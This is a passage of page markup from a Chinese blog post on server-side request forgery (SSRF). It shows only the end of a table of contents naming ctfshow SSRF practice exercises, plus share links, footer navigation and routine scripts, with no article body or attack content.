class="toc-link" href="#yi-xie-sstf-ba-chang-lian-xi-ti"><span class="toc-number">3.</span> <span class="toc-text">一些SSTF靶场练习题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ctfshow-de-ssrf-lian-xi"><span class="toc-number">3.1.</span> <span class="toc-text">ctfshow的ssrf练习</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#can-kao-lian-jie"><span class="toc-number">3.2.</span> <span class="toc-text">参考链接</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&text=SSRF服务器端请求伪造"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&is_video=false&description=SSRF服务器端请求伪造"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=SSRF服务器端请求伪造&body=Check out this article: https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&name=SSRF服务器端请求伪造&description=&lt;!--toc--&gt;
&lt;p&gt;服务器端请求伪造记录&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&t=SSRF服务器端请求伪造"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    1999-2022
    MirRoR4s
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/MirRoR4s">项目</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/MirRoR4s">MyGithub</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
